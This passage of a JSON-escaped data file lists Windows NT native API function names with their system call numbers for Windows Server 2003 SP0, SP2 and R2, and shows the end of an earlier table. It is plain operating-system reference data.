\"NtSetSystemInformation\": \"268\", \"NtSetSystemPowerState\": \"269\", \"NtSetSystemTime\": \"270\", \"NtSetThreadExecutionState\": \"271\", \"NtSetTimerResolution\": \"272\", \"NtSetUuidSeed\": \"273\", \"NtSetVolumeInformationFile\": \"274\", \"NtShutdownSystem\": \"275\", \"NtSignalAndWaitForSingleObject\": \"276\", \"NtStartProfile\": \"277\", \"NtStopProfile\": \"278\", \"NtSuspendProcess\": \"279\", \"NtSuspendThread\": \"280\", \"NtSystemDebugControl\": \"281\", \"NtTerminateJobObject\": \"282\", \"NtTestAlert\": \"283\", \"NtTranslateFilePath\": \"284\", \"NtUnloadDriver\": \"285\", \"NtUnloadKey\": \"286\", \"NtUnloadKey2\": \"287\", \"NtUnloadKeyEx\": \"288\", \"NtUnlockFile\": \"289\", \"NtUnlockVirtualMemory\": \"290\", \"NtVdmControl\": \"291\", \"NtWaitForDebugEvent\": \"292\", \"NtWaitForKeyedEvent\": \"293\", \"NtWaitHighEventPair\": \"294\", \"NtWaitLowEventPair\": \"295\"}}, \"Windows Server 2003\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateUserPhysicalPages\": \"108\", \"NtAllocateUuids\": \"109\", \"NtAreMappedFilesTheSame\": \"110\", \"NtAssignProcessToJobObject\": \"111\", \"NtCancelDeviceWakeupRequest\": \"112\", \"NtCompactKeys\": \"113\", \"NtCompareTokens\": \"114\", \"NtCompleteConnectPort\": \"115\", \"NtCompressKey\": \"116\", \"NtConnectPort\": \"117\", \"NtCreateDebugObject\": \"118\", \"NtCreateDirectoryObject\": \"119\", \"NtCreateEventPair\": \"120\", \"NtCreateIoCompletion\": \"121\", \"NtCreateJobObject\": \"122\", \"NtCreateJobSet\": \"123\", \"NtCreateKeyedEvent\": \"124\", \"NtCreateMailslotFile\": \"125\", \"NtCreateMutant\": \"126\", \"NtCreateNamedPipeFile\": \"127\", \"NtCreatePagingFile\": \"128\", \"NtCreatePort\": \"129\", \"NtCreateProcess\": \"130\", \"NtCreateProfile\": \"131\", \"NtCreateSemaphore\": \"132\", \"NtCreateSymbolicLinkObject\": \"133\", \"NtCreateTimer\": \"134\", \"NtCreateToken\": \"135\", \"NtCreateWaitablePort\": \"136\", \"NtDebugActiveProcess\": \"137\", \"NtDebugContinue\": \"138\", \"NtDeleteAtom\": \"139\", \"NtDeleteBootEntry\": \"140\", \"NtDeleteDriverEntry\": \"141\", \"NtDeleteFile\": \"142\", \"NtDeleteKey\": \"143\", \"NtDeleteObjectAuditAlarm\": \"144\", \"NtDeleteValueKey\": \"145\", \"NtDisplayString\": \"146\", \"NtEnumerateBootEntries\": \"147\", \"NtEnumerateDriverEntries\": \"148\", \"NtEnumerateSystemEnvironmentValuesEx\": \"149\", \"NtExtendSection\": \"150\", \"NtFilterToken\": \"151\", \"NtFlushInstructionCache\": \"152\", \"NtFlushKey\": \"153\", \"NtFlushVirtualMemory\": \"154\", \"NtFlushWriteBuffer\": \"155\", \"NtFreeUserPhysicalPages\": \"156\", \"NtGetContextThread\": \"157\", \"NtGetCurrentProcessorNumber\": \"158\", \"NtGetDevicePowerState\": \"159\", \"NtGetPlugPlayEvent\": \"160\", \"NtGetWriteWatch\": \"161\", \"NtImpersonateAnonymousToken\": \"162\", \"NtImpersonateThread\": \"163\", \"NtInitializeRegistry\": \"164\", \"NtInitiatePowerAction\": \"165\", \"NtIsSystemResumeAutomatic\": \"166\", \"NtListenPort\": \"167\", \"NtLoadDriver\": \"168\", \"NtLoadKey\": \"169\", \"NtLoadKey2\": \"170\", \"NtLoadKeyEx\": \"171\", \"NtLockFile\": \"172\", \"NtLockProductActivationKeys\": \"173\", \"NtLockRegistryKey\": \"174\", \"NtLockVirtualMemory\": \"175\", \"NtMakePermanentObject\": \"176\", \"NtMakeTemporaryObject\": \"177\", \"NtMapUserPhysicalPages\": \"178\", \"NtModifyBootEntry\": \"179\", \"NtModifyDriverEntry\": \"180\", \"NtNotifyChangeDirectoryFile\": \"181\", \"NtNotifyChangeKey\": \"182\", \"NtNotifyChangeMultipleKeys\": \"183\", \"NtOpenEventPair\": \"184\", \"NtOpenIoCompletion\": \"185\", \"NtOpenJobObject\": \"186\", \"NtOpenKeyedEvent\": \"187\", \"NtOpenMutant\": \"188\", \"NtOpenObjectAuditAlarm\": \"189\", \"NtOpenProcessToken\": \"190\", \"NtOpenSemaphore\": \"191\", \"NtOpenSymbolicLinkObject\": \"192\", \"NtOpenThread\": \"193\", \"NtOpenTimer\": \"194\", \"NtPlugPlayControl\": \"195\", \"NtPrivilegeCheck\": \"196\", \"NtPrivilegeObjectAuditAlarm\": \"197\", \"NtPrivilegedServiceAuditAlarm\": \"198\", \"NtPulseEvent\": \"199\", \"NtQueryBootEntryOrder\": \"200\", \"NtQueryBootOptions\": \"201\", \"NtQueryDebugFilterState\": \"202\", \"NtQueryDirectoryObject\": \"203\", \"NtQueryDriverEntryOrder\": \"204\", \"NtQueryEaFile\": \"205\", \"NtQueryFullAttributesFile\": \"206\", \"NtQueryInformationAtom\": \"207\", \"NtQueryInformationJobObject\": \"208\", \"NtQueryInformationPort\": \"209\", \"NtQueryInstallUILanguage\": \"210\", \"NtQueryIntervalProfile\": \"211\", \"NtQueryIoCompletion\": \"212\", \"NtQueryMultipleValueKey\": \"213\", \"NtQueryMutant\": \"214\", \"NtQueryOpenSubKeys\": \"215\", \"NtQueryOpenSubKeysEx\": \"216\", \"NtQueryPortInformationProcess\": \"217\", \"NtQueryQuotaInformationFile\": \"218\", \"NtQuerySecurityObject\": \"219\", \"NtQuerySemaphore\": \"220\", \"NtQuerySymbolicLinkObject\": \"221\", \"NtQuerySystemEnvironmentValue\": \"222\", \"NtQuerySystemEnvironmentValueEx\": \"223\", \"NtQueryTimerResolution\": \"224\", \"NtRaiseException\": \"225\", \"NtRaiseHardError\": \"226\", \"NtRegisterThreadTerminatePort\": \"227\", \"NtReleaseKeyedEvent\": \"228\", \"NtRemoveProcessDebug\": \"229\", \"NtRenameKey\": \"230\", \"NtReplaceKey\": \"231\", \"NtReplyWaitReplyPort\": \"232\", \"NtRequestDeviceWakeup\": \"233\", \"NtRequestPort\": \"234\", \"NtRequestWakeupLatency\": \"235\", \"NtResetEvent\": \"236\", \"NtResetWriteWatch\": \"237\", \"NtRestoreKey\": \"238\", \"NtResumeProcess\": \"239\", \"NtSaveKey\": \"240\", \"NtSaveKeyEx\": \"241\", \"NtSaveMergedKeys\": \"242\", \"NtSecureConnectPort\": \"243\", \"NtSetBootEntryOrder\": \"244\", \"NtSetBootOptions\": \"245\", \"NtSetContextThread\": \"246\", \"NtSetDebugFilterState\": \"247\", \"NtSetDefaultHardErrorPort\": \"248\", \"NtSetDefaultLocale\": \"249\", \"NtSetDefaultUILanguage\": \"250\", \"NtSetDriverEntryOrder\": \"251\", \"NtSetEaFile\": \"252\", \"NtSetHighEventPair\": \"253\", \"NtSetHighWaitLowEventPair\": \"254\", \"NtSetInformationDebugObject\": \"255\", \"NtSetInformationJobObject\": \"256\", \"NtSetInformationKey\": \"257\", \"NtSetInformationToken\": \"258\", \"NtSetIntervalProfile\": \"259\", \"NtSetIoCompletion\": \"260\", \"NtSetLdtEntries\": \"261\", \"NtSetLowEventPair\": \"262\", \"NtSetLowWaitHighEventPair\": \"263\", \"NtSetQuotaInformationFile\": \"264\", \"NtSetSecurityObject\": \"265\", \"NtSetSystemEnvironmentValue\": \"266\", \"NtSetSystemEnvironmentValueEx\": \"267\", \"NtSetSystemInformation\": \"268\", \"NtSetSystemPowerState\": \"269\", \"NtSetSystemTime\": \"270\", \"NtSetThreadExecutionState\": \"271\", \"NtSetTimerResolution\": \"272\", \"NtSetUuidSeed\": \"273\", \"NtSetVolumeInformationFile\": \"274\", \"NtShutdownSystem\": \"275\", \"NtSignalAndWaitForSingleObject\": \"276\", \"NtStartProfile\": \"277\", \"NtStopProfile\": \"278\", \"NtSuspendProcess\": \"279\", \"NtSuspendThread\": \"280\", \"NtSystemDebugControl\": \"281\", \"NtTerminateJobObject\": \"282\", \"NtTestAlert\": \"283\", \"NtTranslateFilePath\": \"284\", \"NtUnloadDriver\": \"285\", \"NtUnloadKey\": \"286\", \"NtUnloadKey2\": \"287\", \"NtUnloadKeyEx\": \"288\", \"NtUnlockFile\": \"289\", \"NtUnlockVirtualMemory\": \"290\", \"NtVdmControl\": \"291\", \"NtWaitForDebugEvent\": \"292\", \"NtWaitForKeyedEvent\": \"293\", \"NtWaitHighEventPair\": \"294\", \"NtWaitLowEventPair\": \"295\"}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateUserPhysicalPages\": \"108\", \"NtAllocateUuids\": \"109\", \"NtAreMappedFilesTheSame\": \"110\", \"NtAssignProcessToJobObject\": \"111\", \"NtCancelDeviceWakeupRequest\": \"112\", \"NtCompactKeys\": \"113\", \"NtCompareTokens\": \"114\", \"NtCompleteConnectPort\": \"115\", \"NtCompressKey\": \"116\", \"NtConnectPort\": \"117\", \"NtCreateDebugObject\": \"118\", \"NtCreateDirectoryObject\": \"119\", \"NtCreateEventPair\": \"120\", \"NtCreateIoCompletion\": \"121\", \"NtCreateJobObject\": \"122\", \"NtCreateJobSet\": \"123\", \"NtCreateKeyedEvent\": \"124\", \"NtCreateMailslotFile\": \"125\", \"NtCreateMutant\": \"126\", \"NtCreateNamedPipeFile\": \"127\", \"NtCreatePagingFile\": \"128\", \"NtCreatePort\": \"129\", \"NtCreateProcess\": \"130\", \"NtCreateProfile\": \"131\", \"NtCreateSemaphore\": \"132\", \"NtCreateSymbolicLinkObject\": \"133\", \"NtCreateTimer\": \"134\", \"NtCreateToken\": \"135\", \"NtCreateWaitablePort\": \"136\", \"NtDebugActiveProcess\": \"137\", \"NtDebugContinue\": \"138\", \"NtDeleteAtom\": \"139\", \"NtDeleteBootEntry\": \"140\", \"NtDeleteDriverEntry\": \"141\", \"NtDeleteFile\": \"142\", \"NtDeleteKey\": \"143\", \"NtDeleteObjectAuditAlarm\": \"144\", \"NtDeleteValueKey\": \"145\", \"NtDisplayString\": \"146\", \"NtEnumerateBootEntries\": \"147\", \"NtEnumerateDriverEntries\": \"148\", \"NtEnumerateSystemEnvironmentValuesEx\": \"149\", \"NtExtendSection\": \"150\", \"NtFilterToken\": \"151\", \"NtFlushInstructionCache\": \"152\", \"NtFlushKey\": \"153\", \"NtFlushVirtualMemory\": \"154\", \"NtFlushWriteBuffer\": \"155\", \"NtFreeUserPhysicalPages\": \"156\", \"NtGetContextThread\": \"157\", \"NtGetCurrentProcessorNumber\": \"158\", \"NtGetDevicePowerState\": \"159\", \"NtGetPlugPlayEvent\": \"160\", \"NtGetWriteWatch\": \"161\", \"NtImpersonateAnonymousToken\": \"162\", \"NtImpersonateThread\": \"163\", \"NtInitializeRegistry\": \"164\", \"NtInitiatePowerAction\": \"165\", \"NtIsSystemResumeAutomatic\": \"166\", \"NtListenPort\": \"167\", \"NtLoadDriver\": \"168\", \"NtLoadKey\": \"169\", \"NtLoadKey2\": \"170\", \"NtLoadKeyEx\": \"171\", \"NtLockFile\": \"172\", \"NtLockProductActivationKeys\": \"173\", \"NtLockRegistryKey\": \"174\", \"NtLockVirtualMemory\": \"175\", \"NtMakePermanentObject\": \"176\", \"NtMakeTemporaryObject\": \"177\", \"NtMapUserPhysicalPages\": \"178\", \"NtModifyBootEntry\": \"179\", \"NtModifyDriverEntry\": \"180\", \"NtNotifyChangeDirectoryFile\": \"181\", \"NtNotifyChangeKey\": \"182\", \"NtNotifyChangeMultipleKeys\": \"183\", \"NtOpenEventPair\": \"184\", \"NtOpenIoCompletion\": \"185\", \"NtOpenJobObject\": \"186\", \"NtOpenKeyedEvent\": \"187\", \"NtOpenMutant\": \"188\", \"NtOpenObjectAuditAlarm\": \"189\", \"NtOpenProcessToken\": \"190\", \"NtOpenSemaphore\": \"191\", \"NtOpenSymbolicLinkObject\": \"192\", \"NtOpenThread\": \"193\", \"NtOpenTimer\": \"194\", \"NtPlugPlayControl\": \"195\", \"NtPrivilegeCheck\": \"196\", \"NtPrivilegeObjectAuditAlarm\": \"197\", \"NtPrivilegedServiceAuditAlarm\": \"198\", \"NtPulseEvent\": \"199\", \"NtQueryBootEntryOrder\": \"200\", \"NtQueryBootOptions\": \"201\", \"NtQueryDebugFilterState\": \"202\", \"NtQueryDirectoryObject\": \"203\", \"NtQueryDriverEntryOrder\": \"204\", \"NtQueryEaFile\": \"205\", \"NtQueryFullAttributesFile\": \"206\", \"NtQueryInformationAtom\": \"207\", \"NtQueryInformationJobObject\": \"208\", \"NtQueryInformationPort\": \"209\", \"NtQueryInstallUILanguage\": \"210\", \"NtQueryIntervalProfile\": \"211\", \"NtQueryIoCompletion\": \"212\", \"NtQueryMultipleValueKey\": \"213\", \"NtQueryMutant\": \"214\", \"NtQueryOpenSubKeys\": \"215\", \"NtQueryOpenSubKeysEx\": \"216\", \"NtQueryPortInformationProcess\": \"217\", \"NtQueryQuotaInformationFile\": \"218\", \"NtQuerySecurityObject\": \"219\", \"NtQuerySemaphore\": \"220\", \"NtQuerySymbolicLinkObject\": \"221\", \"NtQuerySystemEnvironmentValue\": \"222\", \"NtQuerySystemEnvironmentValueEx\": \"223\", \"NtQueryTimerResolution\": \"224\", \"NtRaiseException\": \"225\", \"NtRaiseHardError\": \"226\", \"NtRegisterThreadTerminatePort\": \"227\", \"NtReleaseKeyedEvent\": \"228\", \"NtRemoveProcessDebug\": \"229\", \"NtRenameKey\": \"230\", \"NtReplaceKey\": \"231\", \"NtReplyWaitReplyPort\": \"232\", \"NtRequestDeviceWakeup\": \"233\", \"NtRequestPort\": \"234\", \"NtRequestWakeupLatency\": \"235\", \"NtResetEvent\": \"236\", \"NtResetWriteWatch\": \"237\", \"NtRestoreKey\": \"238\", \"NtResumeProcess\": \"239\", \"NtSaveKey\": \"240\", \"NtSaveKeyEx\": \"241\", \"NtSaveMergedKeys\": \"242\", \"NtSecureConnectPort\": \"243\", \"NtSetBootEntryOrder\": \"244\", \"NtSetBootOptions\": \"245\", \"NtSetContextThread\": \"246\", \"NtSetDebugFilterState\": \"247\", \"NtSetDefaultHardErrorPort\": \"248\", \"NtSetDefaultLocale\": \"249\", \"NtSetDefaultUILanguage\": \"250\", \"NtSetDriverEntryOrder\": \"251\", \"NtSetEaFile\": \"252\", \"NtSetHighEventPair\": \"253\", \"NtSetHighWaitLowEventPair\": \"254\", \"NtSetInformationDebugObject\": \"255\", \"NtSetInformationJobObject\": \"256\", \"NtSetInformationKey\": \"257\", \"NtSetInformationToken\": \"258\", \"NtSetIntervalProfile\": \"259\", \"NtSetIoCompletion\": \"260\", \"NtSetLdtEntries\": \"261\", \"NtSetLowEventPair\": \"262\", \"NtSetLowWaitHighEventPair\": \"263\", \"NtSetQuotaInformationFile\": \"264\", \"NtSetSecurityObject\": \"265\", \"NtSetSystemEnvironmentValue\": \"266\", \"NtSetSystemEnvironmentValueEx\": \"267\", \"NtSetSystemInformation\": \"268\", \"NtSetSystemPowerState\": \"269\", \"NtSetSystemTime\": \"270\", \"NtSetThreadExecutionState\": \"271\", \"NtSetTimerResolution\": \"272\", \"NtSetUuidSeed\": \"273\", \"NtSetVolumeInformationFile\": \"274\", \"NtShutdownSystem\": \"275\", \"NtSignalAndWaitForSingleObject\": \"276\", \"NtStartProfile\": \"277\", \"NtStopProfile\": \"278\", \"NtSuspendProcess\": \"279\", \"NtSuspendThread\": \"280\", \"NtSystemDebugControl\": \"281\", \"NtTerminateJobObject\": \"282\", \"NtTestAlert\": \"283\", \"NtTranslateFilePath\": \"284\", \"NtUnloadDriver\": \"285\", \"NtUnloadKey\": \"286\", \"NtUnloadKey2\": \"287\", \"NtUnloadKeyEx\": \"288\", \"NtUnlockFile\": \"289\", \"NtUnlockVirtualMemory\": \"290\", \"NtVdmControl\": \"291\", \"NtWaitForDebugEvent\": \"292\", \"NtWaitForKeyedEvent\": \"293\", \"NtWaitHighEventPair\": \"294\", \"NtWaitLowEventPair\": \"295\"}, \"R2\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateUserPhysicalPages\": \"108\", \"NtAllocateUuids\": \"109\", \"NtAreMappedFilesTheSame\": \"110\", \"NtAssignProcessToJobObject\": \"111\", \"NtCancelDeviceWakeupRequest\": \"112\", \"NtCompactKeys\": \"113\", \"NtCompareTokens\": \"114\", \"NtCompleteConnectPort\": \"115\", \"NtCompressKey\": \"116\", \"NtConnectPort\": \"117\", \"NtCreateDebugObject\": \"118\", \"NtCreateDirectoryObject\": \"119\", \"NtCreateEventPair\": \"120\", \"NtCreateIoCompletion\": \"121\", \"NtCreateJobObject\": \"122\", \"NtCreateJobSet\": \"123\", \"NtCreateKeyedEvent\": \"124\", \"NtCreateMailslotFile\": \"125\", \"NtCreateMutant\": \"126\", \"NtCreateNamedPipeFile\": \"127\", \"NtCreatePagingFile\": \"128\", \"NtCreatePort\": \"129\", \"NtCreateProcess\": \"130\", \"NtCreateProfile\": \"131\", \"NtCreateSemaphore\": \"132\", \"NtCreateSymbolicLinkObject\": \"133\", \"NtCreateTimer\": \"134\", \"NtCreateToken\": \"135\", \"NtCreateWaitablePort\": \"136\", \"NtDebugActiveProcess\": \"137\", \"NtDebugContinue\": \"138\", \"NtDeleteAtom\": \"139\", \"NtDeleteBootEntry\": \"140\", \"NtDeleteDriverEntry\": \"141\", \"NtDeleteFile\": \"142\", \"NtDeleteKey\": \"143\", \"NtDeleteObjectAuditAlarm\": 